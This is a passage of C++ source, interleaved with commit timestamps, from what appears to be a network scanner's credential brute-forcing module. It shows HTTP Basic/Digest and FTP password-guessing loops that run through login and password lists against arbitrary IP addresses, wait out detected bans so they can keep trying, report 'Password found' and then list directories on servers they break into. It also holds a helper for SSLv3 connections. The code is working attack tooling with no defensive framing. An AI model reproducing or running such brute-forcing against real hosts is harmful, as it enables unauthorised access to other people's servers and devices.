stt - > doEmitionRedFoundData ( " [BA] Send error! [ " + QString ( ip ) + " ] " ) ;
2014-11-22 16:22:24 +00:00
CSSOCKET ( sock ) ;
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
}
}
else
{
int WSAErr = WSAGetLastError ( ) ;
if ( WSAErr ! = 10060 )
{
stt - > doEmitionRedFoundData ( " [BA] Cannot connect to " + QString ( ip ) + " [ " + QString : : number ( WSAErr ) + " ] " ) ;
} ;
2014-11-22 16:22:24 +00:00
CSSOCKET ( sock ) ;
2014-09-07 18:54:46 +00:00
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
} ;
2014-11-22 16:22:24 +00:00
CSSOCKET ( sock ) ;
2014-09-07 18:54:46 +00:00
} ;
# pragma endregion
if ( MapWidgetOpened ) stt - > doEmitionAddIncData ( QString ( ip ) , QString ( recvBuff ) ) ;
if ( dataSz = = 0 )
{
2014-11-03 19:05:36 +00:00
stt - > doEmitionBAData ( " [BA] No reply from: " + QString ( ip ) + " ; Repeating... " ) ;
2014-09-07 18:54:46 +00:00
- - j ;
continue ;
2014-11-03 19:05:36 +00:00
}
else
{
+ + passCounter ;
2014-09-07 18:54:46 +00:00
} ;
2014-11-03 19:05:36 +00:00
2014-09-07 18:54:46 +00:00
if ( strcmp ( method , " [DIGEST] " ) = = 0 )
{
2014-09-19 19:27:28 +00:00
ZeroMemory ( localBuff , sizeof ( localBuff ) ) ;
2014-09-07 18:54:46 +00:00
strcpy ( localBuff , recvBuff ) ;
} ;
if ( strstri ( recvBuff , " http/1.1 401 " ) = = NULL
| | strstri ( recvBuff , " http/1.0 401 " ) = = NULL
)
{
///dummy///
}
else if ( strstri ( recvBuff , " 503 service unavailable " ) ! = NULL
| | strstri ( recvBuff , " http/1.1 503 " ) ! = NULL
| | strstri ( recvBuff , " http/1.0 503 " ) ! = NULL
| | strstr ( recvBuff , " 400 BAD_REQUEST " ) ! = NULL
| | strstri ( recvBuff , " 400 bad request " ) ! = NULL
| | strstr ( recvBuff , " 403 Forbidden " ) ! = NULL
)
{
stt - > doEmition_BARedData ( " [.] 503/400/403 - Waiting 30sec ( " + QString ( ip ) + " : " + QString : : number ( port ) + " ) " ) ;
if ( j > 0 ) - - j ;
Sleep ( 30000 ) ;
}
else if ( ( strstri ( recvBuff , " http/1.1 404 " ) ! = NULL
| | strstri ( recvBuff , " http/1.0 404 " ) ! = NULL
)
& & strstri ( recvBuff , " Authorization required " ) = = NULL
)
{
if ( HTMLDebugMode ) _DebugWriteHTMLToFile ( request , recvBuff ) ;
stt - > doEmitionRedFoundData ( " [-] 404 - Wrong path detected. ( " + QString ( ip ) + " : " + QString : : number ( port ) + QString ( path ) + " ) " ) ;
2014-11-22 16:22:24 +00:00
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
}
else if ( ( strstri ( recvBuff , " 200 ok " ) ! = NULL
| | strstri ( recvBuff , " http/1.0 200 " ) ! = NULL
2014-09-19 19:27:28 +00:00
)
2014-09-07 18:54:46 +00:00
& & strstri ( recvBuff , " http/1.1 401 " ) = = NULL
& & strstri ( recvBuff , " http/1.0 401 " ) = = NULL
2014-09-19 19:27:28 +00:00
& & strstr ( headerMsg , " <statusValue>401</statusValue> " ) = = NULL
& & strstr ( headerMsg , " <statusString>Unauthorized</statusString> " ) = = NULL
2014-09-07 18:54:46 +00:00
& & dataSz > 13
)
{
if ( strstri ( recvBuff , " access is denied " ) = = NULL
& & strstri ( recvBuff , " iisstart " ) = = NULL
& & strstri ( recvBuff , " Location: " ) = = NULL
& & strstri ( recvBuff , " access forbidden " ) = = NULL
)
{
2014-09-19 19:27:28 +00:00
ZeroMemory ( pass , sizeof ( pass ) ) ;
2014-09-07 18:54:46 +00:00
strcpy ( pass , ip ) ;
strcat ( pass , " - Password found: " ) ;
strcat ( pass , tPass ) ;
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
stt - > doEmition_BAGreenData ( " [+] " + QString ( pass ) ) ;
strcpy ( lps . login , curLogin ) ;
strcpy ( lps . pass , curPass ) ;
return lps ;
} ;
}
else
{
2014-09-19 19:27:28 +00:00
ZeroMemory ( pass , sizeof ( pass ) ) ;
2014-09-07 18:54:46 +00:00
strcpy ( pass , ip ) ;
strcat ( pass , " - Password found: " ) ;
strcat ( pass , tPass ) ;
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
char * pt1 = strstr ( recvBuff , " " ) ;
if ( pt1 ! = NULL )
{
char * pt2 = strstr ( pt1 + 1 , " " ) ;
if ( pt2 ! = NULL )
{
int sz = pt2 - pt1 - 1 ;
char tempHeaderCode [ 16 ] = { 0 } ;
strncpy ( tempHeaderCode , pt1 + 1 , sz ) ;
if ( strcmp ( tempHeaderCode , " 302 " ) = = 0 & & strcmp ( tempHeaderCode , " 200 " ) = = 0 ) stt - > doEmitionYellowFoundData ( " [+] No/unexpected HTTP header detected ( " + QString ( tempHeaderCode ) + " ) IP: <a style= \" color: #efe100; \" href= \" http:// " + QString ( ip ) + " : " + QString : : number ( port ) + " \" > " + QString ( ip ) + " : " + QString : : number ( port ) + " </a> " ) ;
strcpy ( lps . login , curLogin ) ;
strcpy ( lps . pass , curPass ) ;
return lps ;
} ;
} ;
2014-09-19 19:27:28 +00:00
stt - > doEmitionYellowFoundData ( " [+] No/unexpected HTTP header detected (?) IP: <a style= \" color: #efe100; \" href= \" http:// " + QString ( ip ) + " : " + QString : : number ( port ) + " \" > " + QString ( ip ) + " : " + QString : : number ( port ) + " </a> " ) ;
strcpy ( lps . login , curLogin ) ;
strcpy ( lps . pass , curPass ) ;
return lps ;
} ;
if ( strstr ( recvBuff , " Set-Cookie: " ) ! = NULL )
{
ZeroMemory ( cookie , COOKIE_MAX_SIZE ) ;
strncpy ( cookie , _getAttribute ( recvBuff , " Set-Cookie: " ) , COOKIE_MAX_SIZE ) ;
cookieLen = strlen ( cookie ) ;
2014-09-07 18:54:46 +00:00
} ;
} ;
} ;
# pragma endregion
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
}
lopaStr Connector : : _BALobby ( char * cookie , char * ip , int port , char * path , char * method , char * data = NULL )
{
while ( BrutingThrds > = gMaxBrutingThreads ) Sleep ( 700 ) ;
BConInc ( ) ;
lopaStr res = _BABrute ( cookie , ip , port , path , method ) ;
BConDec ( ) ;
return res ;
} ;
lopaStr _FTPBrute ( char * ip , int port , PathStr * ps )
{
lopaStr lps ;
ZeroMemory ( lps . login , sizeof ( lps . login ) ) ;
ZeroMemory ( lps . pass , sizeof ( lps . pass ) ) ;
ZeroMemory ( lps . other , sizeof ( lps . other ) ) ;
char recvBuff [ 1024 ] = { 0 } , request [ 64 ] = { 0 } ;
int connectionResult , closedSocket = 1 , loginFailedFlag = 0 ;
SOCKET sockFTP ;
sockaddr_in sockAddr ;
sockAddr . sin_family = AF_INET ;
sockAddr . sin_port = htons ( port ) ;
HOSTENT * host ;
# if defined(WIN32)
if ( inet_addr ( ip ) ! = INADDR_NONE ) sockAddr . sin_addr . S_un . S_addr = inet_addr ( ip ) ;
else if ( host = gethostbyname ( ip ) ) ( ( unsigned long * ) & sockAddr . sin_addr ) [ 0 ] = ( ( unsigned long * * ) host - > h_addr_list ) [ 0 ] [ 0 ] ;
else
2014-09-19 19:27:28 +00:00
{
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
2014-09-07 18:54:46 +00:00
} ;
# else
if ( inet_addr ( ip ) ! = INADDR_NONE ) sockAddr . sin_addr . s_addr = inet_addr ( ip ) ;
else if ( host = gethostbyname ( ip ) ) ( ( unsigned long * ) & sockAddr . sin_addr ) [ 0 ] = ( ( unsigned long * * ) host - > h_addr_list ) [ 0 ] [ 0 ] ;
else
{
2014-09-19 19:27:28 +00:00
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
2014-09-07 18:54:46 +00:00
} ;
# endif
bool breakPassLoop = 0 ;
int passCounter = 1 ;
int bTO ;
int x = 0 ;
for ( int i = 0 ; i < MaxLogin ; + + i )
{
if ( globalScanFlag = = false ) break ;
if ( strlen ( loginLst [ i ] ) < = 1 ) continue ;
for ( int j = 0 ; j < MaxPass ; + + j )
{
if ( globalScanFlag = = false ) break ;
if ( strlen ( passLst [ j ] ) < = 1 ) continue ;
if ( closedSocket )
{
closedSocket = 0 ;
sockFTP = socket ( AF_INET , SOCK_STREAM , IPPROTO_TCP ) ;
connectionResult = connect ( sockFTP , ( sockaddr * ) & sockAddr , sizeof ( sockAddr ) ) ;
int cErrCode = WSAGetLastError ( ) ;
while ( cErrCode = = 10038 )
{
if ( gDebugMode ) stt - > doEmitionDebugFoundData ( " [FTP] 10038 occured -- [ " + QString ( ip ) + " : " + QString : : number ( port ) + " ] " ) ;
2014-11-22 16:22:24 +00:00
CSSOCKET ( sockFTP ) ;
2014-09-07 18:54:46 +00:00
sockFTP = socket ( AF_INET , SOCK_STREAM , IPPROTO_TCP ) ;
connectionResult = connect ( sockFTP , ( sockaddr * ) & sockAddr , sizeof ( sockAddr ) ) ;
cErrCode = WSAGetLastError ( ) ;
} ;
loginFailedFlag = 0 ;
} ;
2014-10-26 15:05:51 +00:00
isActive = 1 ;
2014-09-07 18:54:46 +00:00
if ( connectionResult ! = SOCKET_ERROR )
{
x = 0 ;
while ( true )
{
Sleep ( 100 ) ;
if ( globalScanFlag = = false ) break ;
2014-09-19 19:27:28 +00:00
ZeroMemory ( recvBuff , sizeof ( recvBuff ) ) ;
2014-09-07 18:54:46 +00:00
x = recvWT ( sockFTP , recvBuff , 1024 , gTimeOut + 5 , & bTO ) ;
if ( x < = 0 ) break ;
if ( MapWidgetOpened ) stt - > doEmitionAddIncData ( QString ( ip ) , QString ( recvBuff ) ) ;
Activity + = x ;
closedSocket = 0 ;
if ( strstr ( recvBuff , " 451 The parameter is incorrect " ) ! = NULL
)
{
2014-11-22 16:22:24 +00:00
CSSOCKET ( sockFTP ) ;
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
stt - > doEmition_BARedData ( " [*] Unknown protocol (451 Error) - " + QString ( ip ) ) ;
strcpy ( lps . other , " Unknown protocol (451 Error) " ) ;
return lps ;
} ;
if ( strstri ( recvBuff , " only anonymous " ) ! = NULL )
{
2014-11-22 16:22:24 +00:00
CSSOCKET ( sockFTP ) ;
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
stt - > doEmition_BAGreenData ( " [*] Anonymous access detected - " + QString ( ip ) ) ;
2014-11-22 16:22:24 +00:00
2014-09-07 18:54:46 +00:00
strcpy ( lps . login , " anonymous " ) ;
strcpy ( lps . pass , " 1 " ) ;
return lps ;
} ;
if ( strstr ( recvBuff , " 550 no connections allowed " ) ! = NULL
| | strstr ( recvBuff , " 550- " ) ! = NULL
)
{
2014-11-22 16:22:24 +00:00
CSSOCKET ( sockFTP ) ;
2014-09-07 18:54:46 +00:00
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
# pragma region QTGUI_Area
stt - > doEmition_BARedData ( " [-] 550 (No connections allowed) - Ban detected. Dropping " + QString ( ip ) ) ;
# pragma endregion
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
} ;
if ( strstr ( recvBuff , " no such command " ) )
{
2014-11-22 16:22:24 +00:00
CSSOCKET ( sockFTP ) ;
2014-09-07 18:54:46 +00:00
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
stt - > doEmition_BARedData ( " [-] 500 (Sorry, no such command) " + QString ( ip ) ) ;
strcpy ( lps . other , " [500 Sorry, no such command] " ) ;
return lps ;
} ;
if ( ( strstr ( recvBuff , " 500 " ) ! = NULL
| | strstr ( recvBuff , " 500- " ) ! = NULL
)
& & strstri ( recvBuff , " 500 oops " ) = = NULL
)
{
j = 0 ;
2014-11-22 16:22:24 +00:00
CSSOCKET ( sockFTP ) ;
2014-09-07 18:54:46 +00:00
closedSocket = 1 ;
2014-09-19 19:27:28 +00:00
ZeroMemory ( recvBuff , sizeof ( recvBuff ) ) ;
2014-09-07 18:54:46 +00:00
break ;
} ;
if ( strstr ( recvBuff , " 421 " ) ! = NULL | | strstr ( recvBuff , " 421- " ) ! = NULL )
{
2014-11-22 16:22:24 +00:00
CSSOCKET ( sockFTP ) ;
2014-09-07 18:54:46 +00:00
closedSocket = 1 ;
2014-09-19 19:27:28 +00:00
ZeroMemory ( recvBuff , sizeof ( recvBuff ) ) ;
2014-09-07 18:54:46 +00:00
break ;
} ;
if ( strstri ( recvBuff , " 530 Sorry, no ANONYMOUS access allowed. " ) ! = NULL )
{
+ + i ;
2014-11-22 16:22:24 +00:00
CSSOCKET ( sockFTP ) ;
2014-09-07 18:54:46 +00:00
closedSocket = 1 ;
2014-09-19 19:27:28 +00:00
ZeroMemory ( recvBuff , sizeof ( recvBuff ) ) ;
2014-09-07 18:54:46 +00:00
break ;
} ;
if ( ( strstr ( recvBuff , " 530 Sorry " ) ! = NULL )
| | ( strstr ( recvBuff , " 530 " ) ! = NULL & & strstr ( recvBuff , " maximum " ) ! = NULL )
| | strstr ( recvBuff , " exceeded " ) ! = NULL
| | strstr ( recvBuff , " 421 Too many " ) ! = NULL
| | strstr ( recvBuff , " from this IP " ) ! = NULL
| | strstr ( recvBuff , " from your IP " ) ! = NULL )
{
# pragma region QTGUI_Area
stt - > doEmition_BARedData ( " [-] FTP: 530 - Ban detected? Waiting 30sec ( " + QString ( ip ) + " ) " ) ;
# pragma endregion
2014-11-22 16:22:24 +00:00
CSSOCKET ( sockFTP ) ;
2014-09-07 18:54:46 +00:00
closedSocket = 1 ;
if ( j > 0 ) - - j ;
2014-09-19 19:27:28 +00:00
ZeroMemory ( recvBuff , sizeof ( recvBuff ) ) ;
2014-09-07 18:54:46 +00:00
Sleep ( 30000 ) ;
break ;
}
else if ( ( strstr ( recvBuff , " 220 " ) ! = NULL | | loginFailedFlag = = 1 | | strstr ( recvBuff , " 503 " ) ! = NULL | | strstr ( recvBuff , " server ready " ) ! = NULL ) )
{
strcpy ( request , " USER " ) ;
if ( strlen ( loginLst [ i ] ) ! = 0 ) strcat ( request , loginLst [ i ] ) ;
else
{
loginFailedFlag = 1 ;
2014-09-19 19:27:28 +00:00
ZeroMemory ( recvBuff , sizeof ( recvBuff ) ) ;
2014-09-07 18:54:46 +00:00
break ;
} ;
strcat ( request , " \r \n " ) ;
if ( send ( sockFTP , request , strlen ( request ) , 0 ) ! = SOCKET_ERROR )
{
if ( MapWidgetOpened ) stt - > doEmitionAddOutData ( QString ( ip ) , QString ( request ) ) ;
Activity + = strlen ( request ) ;
2014-09-19 19:27:28 +00:00
ZeroMemory ( request , sizeof ( request ) ) ;
2014-09-07 18:54:46 +00:00
}
else
{
stt - > doEmitionRedFoundData ( " [FTP] Send error. " + QString ( ip ) + " : " + QString : : number ( port ) ) ;
} ;
}
else if ( strstr ( recvBuff , " 530 " ) ! = NULL
| | strstr ( recvBuff , " Login incorrect " ) ! = NULL
| | strstri ( recvBuff , " 500 oops " ) ! = NULL
)
{
loginFailedFlag = 1 ;
2014-09-19 19:27:28 +00:00
ZeroMemory ( recvBuff , sizeof ( recvBuff ) ) ;
2014-09-07 18:54:46 +00:00
break ;
}
else if ( strstr ( recvBuff , " 331 " ) ! = NULL )
{
if ( strstr ( recvBuff , " Non-anonymous sessions must use encryption " ) ! = NULL
| | strstr ( recvBuff , " Rejected--secure connection required " ) ! = NULL
)
{
stt - > doEmition_BARedData ( " FTP server ( " + QString ( ip ) + " ) appears to require SSL for specified user: " + QString ( loginLst [ i ] ) ) ;
2014-11-22 16:22:24 +00:00
CSSOCKET ( sockFTP ) ;
2014-09-07 18:54:46 +00:00
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
}
else if ( strstri ( recvBuff , " permission denied " ) = = NULL )
{
strcpy ( request , " PASS " ) ;
if ( strlen ( passLst [ j ] ) ! = 0 ) strcat ( request , passLst [ j ] ) ;
else
{
loginFailedFlag = 1 ;
2014-09-19 19:27:28 +00:00
ZeroMemory ( recvBuff , sizeof ( recvBuff ) ) ;
2014-09-07 18:54:46 +00:00
break ;
} ;
strcat ( request , " \r \n " ) ;
if ( send ( sockFTP , request , strlen ( request ) , 0 ) ! = SOCKET_ERROR )
{
if ( MapWidgetOpened ) stt - > doEmitionAddOutData ( QString ( ip ) , QString ( request ) ) ;
Activity + = strlen ( request ) ;
2014-09-19 19:27:28 +00:00
ZeroMemory ( request , sizeof ( request ) ) ;
2014-09-07 18:54:46 +00:00
2014-11-03 12:15:34 +00:00
if ( BALogSwitched ) stt - > doEmitionBAData ( " Probing FTP: " + QString ( ip ) + " : " + QString : : number ( port ) + " ; login/pass: " + QString ( loginLst [ i ] ) + " : " + QString ( passLst [ j ] ) + " ; - Progress: ( " + QString : : number ( ( passCounter / ( double ) ( MaxPass * MaxLogin ) ) * 100 ) . mid ( 0 , 4 ) + " %) " ) ;
+ + passCounter ;
2014-09-07 18:54:46 +00:00
}
else
{
stt - > doEmitionRedFoundData ( " [FTP] Send error. " + QString ( ip ) + " : " + QString : : number ( port ) ) ;
} ;
}
else
{
breakPassLoop = 1 ;
stt - > doEmition_BARedData ( " Permission denied for login - " + QString ( ip ) + " : " + QString : : number ( port ) + " ; login: " + QString ( loginLst [ i ] ) ) ;
break ;
} ;
}
else if ( strstr ( recvBuff , " 230 " ) ! = NULL )
{
char pass [ 128 ] = { 0 } ;
strcpy ( pass , ip ) ;
strcat ( pass , " - FTP Password found: " ) ;
strcat ( pass , loginLst [ i ] ) ;
strcat ( pass , " : " ) ;
strcat ( pass , passLst [ j ] ) ;
char recvBuff2 [ 2048 ] = { 0 } ;
if ( send ( sockFTP , " PASV \r \n " , 6 , 0 ) ! = SOCKET_ERROR )
{
int x = 1 , xx = 0 ;
while ( x ! = 0 )
{
2014-09-19 19:27:28 +00:00
ZeroMemory ( recvBuff , sizeof ( recvBuff ) ) ;
x = recvWT ( sockFTP , recvBuff , sizeof ( recvBuff ) , gTimeOut + 5 , & bTO ) ;
2014-09-07 18:54:46 +00:00
xx + = x ;
if ( xx < 1536 ) strncat ( recvBuff2 , recvBuff , x ) ;
else break ;
} ;
if ( strstri ( recvBuff2 , " unknown command " ) ! = NULL | | strstri ( recvBuff2 , " invalid command " ) ! = NULL )
{
stt - > doEmitionYellowFoundData ( " [-] PASV failed. Router detected? " ) ;
2014-11-22 16:22:24 +00:00
CSSOCKET ( sockFTP ) ;
2014-09-07 18:54:46 +00:00
strcpy ( lps . login , loginLst [ i ] ) ;
strcpy ( lps . pass , passLst [ j ] ) ;
strcpy ( lps . other , " ROUTER " ) ;
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
return lps ;
} ;
# pragma region Get pasv Port
char * ptr0 = strstr ( recvBuff2 , " 227 " ) ;
if ( ptr0 ! = NULL )
{
if ( strstr ( ptr0 , " ( " ) ! = NULL )
{
char pasvData [ 32 ] = { 0 } ;
char * ptr1 = strstr ( ptr0 , " ( " ) ;
char * ptr2 = strstr ( ptr0 , " ) " ) ;
int sz = ptr2 - ptr1 - 1 ;
strncpy ( pasvData , ptr1 + 1 , sz ) ;
char * ptr3 = strstr ( pasvData , " , " ) ;
ptr3 = strstr ( ptr3 + 1 , " , " ) ;
ptr3 = strstr ( ptr3 + 1 , " , " ) ;
ptr3 = strstr ( ptr3 + 1 , " , " ) ;
if ( ptr3 ! = NULL )
{
char * ptrP2 = strstr ( ptr3 + 1 , " , " ) ;
char p1c [ 8 ] = { 0 } ;
sz = ptrP2 - ptr3 - 1 ;
strncpy ( p1c , ptr3 + 1 , sz ) ;
int p1 = atoi ( p1c ) ;
int p2 = atoi ( ptrP2 + 1 ) ;
port = p1 * 256 + p2 ;
sockAddr . sin_port = htons ( port ) ;
SOCKET newSockFTP = socket ( AF_INET , SOCK_STREAM , IPPROTO_TCP ) ;
connectionResult = connect ( newSockFTP , ( sockaddr * ) & sockAddr , sizeof ( sockAddr ) ) ;
send ( sockFTP , " LIST \r \n " , 6 , 0 ) ;
ZeroMemory ( recvBuff , sizeof ( recvBuff ) ) ;
int x = recvWT ( newSockFTP , recvBuff , sizeof ( recvBuff ) , gTimeOut + 3 , & bTO ) ;
if ( x < = 0 | | strstr ( recvBuff , " unknown command " ) ! = NULL )
{
send ( sockFTP , " MLSD \r \n " , 6 , 0 ) ;
ZeroMemory ( recvBuff , sizeof ( recvBuff ) ) ;
x = recvWT ( newSockFTP , recvBuff , sizeof ( recvBuff ) , gTimeOut + 3 , & bTO ) ;
if ( x < = 0 | | strstr ( recvBuff , " unknown command " ) ! = NULL )
{
stt - > doEmition_BAGreenData ( " [?] " + QString ( pass ) + " [MLSD&LIST failed or server closed connection.] " ) ;
2014-11-22 16:22:24 +00:00
CSSOCKET ( sockFTP ) ;
CSSOCKET ( newSockFTP ) ;
2014-09-07 18:54:46 +00:00
closedSocket = 1 ;
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
}
else stt - > doEmition_BAGreenData ( " [+] " + QString ( pass ) + " [MLSD succeeded] " ) ;
}
else stt - > doEmition_BAGreenData ( " [+] " + QString ( pass ) + " [LIST succeeded] " ) ;
2014-11-22 16:22:24 +00:00
CSSOCKET ( newSockFTP ) ;
2014-09-07 18:54:46 +00:00
}
else
{
stt - > doEmitionYellowFoundData ( " [*] " + QString ( ip ) + " [PASV failed] " ) ;
} ;
}
else
{
stt - > doEmitionYellowFoundData ( " [*] " + QString ( ip ) + " [PASV TO] Failed! " ) ;
} ;
}
else
{
stt - > doEmitionYellowFoundData ( " [*] " + QString ( ip ) + " [PASV TO] Failed! " ) ;
} ;
# pragma endregion
if ( xx > 1 )
{
strcpy ( ps - > headr , " </a><pre><font color= \" goldenrod \" > ( " ) ;
strncat ( ps - > headr , recvBuff , 256 ) ;
strcat ( ps - > headr , " )</font></pre> " ) ;
} ;
strcpy ( lps . login , loginLst [ i ] ) ;
strcpy ( lps . pass , passLst [ j ] ) ;
2014-11-22 16:22:24 +00:00
CSSOCKET ( sockFTP ) ;
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
return lps ;
}
else
{
stt - > doEmitionRedFoundData ( " [FTP] Send error. " + QString ( ip ) + " : " + QString : : number ( port ) ) ;
strcpy ( lps . login , loginLst [ i ] ) ;
strcpy ( lps . pass , passLst [ j ] ) ;
2014-11-22 16:22:24 +00:00
CSSOCKET ( sockFTP ) ;
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
return lps ;
} ;
} ;
} ;
2014-11-22 16:22:24 +00:00
CSSOCKET ( sockFTP ) ;
2014-09-07 18:54:46 +00:00
closedSocket = 1 ;
2014-09-19 19:27:28 +00:00
ZeroMemory ( recvBuff , sizeof ( recvBuff ) ) ;
2014-09-07 18:54:46 +00:00
}
else
{
char err [ 128 ] = { 0 } ;
int WSAerr ;
if ( connectionResult = = - 1 ) WSAerr = WSAGetLastError ( ) ;
else WSAerr = 10060 ;
if ( gThreads > 1 & & WSAerr ! = 10060 /*Timeout*/ & & WSAerr ! = 10055 /*POOLOVERFLOW*/ & & WSAerr ! = 10061 /*WSAECONNREFUSED*/ & & WSAerr ! = 10054 /*WSACONNABORTED*/ & & WSAerr ! = 0 )
{
2014-11-22 16:22:24 +00:00
stt - > doEmitionRedFoundData ( " [FTPBrute] Cannot connect to " + QString ( ip ) + " " + QString ( std : : to_string ( ( long double ) WSAerr ) . c_str ( ) ) ) ;
2014-09-07 18:54:46 +00:00
} ;
2014-11-22 16:22:24 +00:00
CSSOCKET ( sockFTP ) ;
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
} ;
Sleep ( 100 ) ;
if ( breakPassLoop )
{
breakPassLoop = false ;
break ;
} ;
} ;
} ;
2014-11-22 16:22:24 +00:00
CSSOCKET ( sockFTP ) ;
2014-10-26 15:05:51 +00:00
isActive = 0 ;
2014-09-07 18:54:46 +00:00
strcpy ( lps . login , " UNKNOWN " ) ;
return lps ;
} ;
lopaStr Connector : : _FTPLobby ( char * ip , int port , PathStr * ps )
{
while ( BrutingThrds > = gMaxBrutingThreads ) Sleep ( 700 ) ;
lopaStr lps ;
ZeroMemory ( lps . login , sizeof ( lps . login ) ) ;
ZeroMemory ( lps . pass , sizeof ( lps . pass ) ) ;
ZeroMemory ( lps . other , sizeof ( lps . other ) ) ;
BConInc ( ) ;
lps = _FTPBrute ( ip , port , ps ) ;
BConDec ( ) ;
return lps ;
} ;
int _sslConnectTo ( char * iph , int porth , char * requesth , conSTR * CSTR )
{
SSL * ssl = NULL ;
int bytes = 0 ;
char * recvBuff2 = 0 ;
int resCode = 0 ;
SOCKET sock ;
2014-09-19 19:27:28 +00:00
SSL_CTX * ctx = NULL ;
const SSL_METHOD * method = SSLv3_client_method ( ) ; /* Create new client-method instance */
ctx = SSL_CTX_new ( method ) ; /* Create new context */
SSL_CTX_set_timeout ( ctx , gTimeOut ) ;
2014-09-07 18:54:46 +00:00
if ( ctx ! = NULL )
{
resCode = OpenConnection ( & sock , iph , porth ) ;
if ( resCode > = 0 )
{
ssl = SSL_new ( ctx ) ; /* create new SSL connection state */
SSL_set_fd ( ssl , sock ) ; /* attach the socket descriptor */
if ( SSL_connect ( ssl ) )
{
SSL_write ( ssl , requesth , strlen ( requesth ) ) ;
if ( MapWidgetOpened ) stt - > doEmitionAddOutData ( QString ( iph ) , QString ( requesth ) ) ;
int x = 256 ;
char recvBuff [ 8192 ] = { 0 } ;
2014-09-19 19:27:28 +00:00
recvBuff2 = new char [ RECV_MAX_SIZE ] ;
ZeroMemory ( recvBuff2 , RECV_MAX_SIZE ) ;
2014-09-07 18:54:46 +00:00
while ( x > 0 )
{
ZeroMemory ( recvBuff , sizeof ( recvBuff ) ) ;
x = SSL_read ( ssl , recvBuff , sizeof ( recvBuff ) ) ;
if ( x < = 0 ) break ;
bytes + = x ;
Activity + = x ;
2014-09-19 19:27:28 +00:00
if ( bytes > RECV_MAX_SIZE )
2014-09-07 18:54:46 +00:00
{
if ( strstri ( recvBuff2 , " http/1. " ) = = NULL )
{
if ( HTMLDebugMode ) _DebugWriteHTMLToFile ( requesth , recvBuff2 ) ;
delete [ ] recvBuff2 ;
2014-11-22 16:22:24 +00:00
recvBuff2 = NULL ;
CSSOCKET ( sock ) ;
2014-09-07 18:54:46 +00:00
+ + Overl ;
CSTR - > lowerBuff = new char [ 11 ] ;
strcpy ( CSTR - > lowerBuff , " [OVERFLOW] " ) ;
CSTR - > size = 10 ;
SSL_free ( ssl ) ;
SSL_CTX_free ( ctx ) ; /* release context */
return 0 ;
}
else break ;
} ;
if ( globalScanFlag = = true )
{
if ( x > 0 )
{
memset ( ( void * ) ( recvBuff + x ) , ' \0 ' , 1 ) ;
strcat ( recvBuff2 , recvBuff ) ;
}
else
{
if ( HTMLDebugMode ) _DebugWriteHTMLToFile ( requesth , recvBuff2 ) ;
delete [ ] recvBuff2 ;
recvBuff2 = NULL ;
2014-11-22 16:22:24 +00:00
CSSOCKET ( sock ) ;
2014-09-07 18:54:46 +00:00
CSTR - > lowerBuff = new char [ 12 ] ;
strcpy ( CSTR - > lowerBuff , " [IGNR_ADDR] " ) ;
CSTR - > size = 11 ;
SSL_free ( ssl ) ;
SSL_CTX_free ( ctx ) ; /* release context */
return 0 ;
} ;
} ;
} ;
if ( bytes < 0 )
{
stt - > doEmitionRedFoundData ( " [SSL](_SSLConnect [bytes < 0]) " + QString ( iph ) + " : " + QString : : number ( porth ) ) ;
} ;
SSL_free ( ssl ) ;
2014-11-22 16:22:24 +00:00
CSSOCKET ( sock ) ;
2014-09-07 18:54:46 +00:00
SSL_CTX_free ( ctx ) ; /* release context */
if ( bytes = = 0 | | recvBuff2 = = NULL )
{
if ( recvBuff2 ! = NULL ) delete [ ] recvBuff2 ;
recvBuff2 = NULL ;
CSTR - > lowerBuff = new char [ 1 ] ;
strcpy ( CSTR - > lowerBuff , " " ) ;
CSTR - > size = 0 ;
return - 1 ;
} ;
if ( MapWidgetOpened ) stt - > doEmitionAddIncData ( QString ( iph ) , QString ( recvBuff2 ) ) ;
std : : string res2 = " " ;
if ( strlen ( recvBuff2 ) > bytes ) bytes = strlen ( recvBuff2 ) ;
CSTR - > lowerBuff = new char [ bytes + 1 ] ;
ZeroMemory ( CSTR - > lowerBuff , sizeof ( CSTR - > lowerBuff ) ) ;
strncpy ( CSTR - > lowerBuff , recvBuff2 , bytes ) ;
delete [ ] recvBuff2 ;
recvBuff2 = NULL ;
CSTR - > size = bytes ;
if ( HTMLDebugMode ) _DebugWriteHTMLToFile ( requesth , CSTR - > lowerBuff ) ;
return 0 ;
}
else
{
delete [ ] recvBuff2 ;
recvBuff2 = NULL ;
2014-11-22 16:22:24 +00:00
CSSOCKET ( sock ) ;
2014-09-07 18:54:46 +00:00
SSL_free ( ssl ) ;
SSL_CTX_free ( ctx ) ; /* release context */
CSTR - > lowerBuff = new char [ 1 ] ;
strcpy ( CSTR - > lowerBuff , " " ) ;
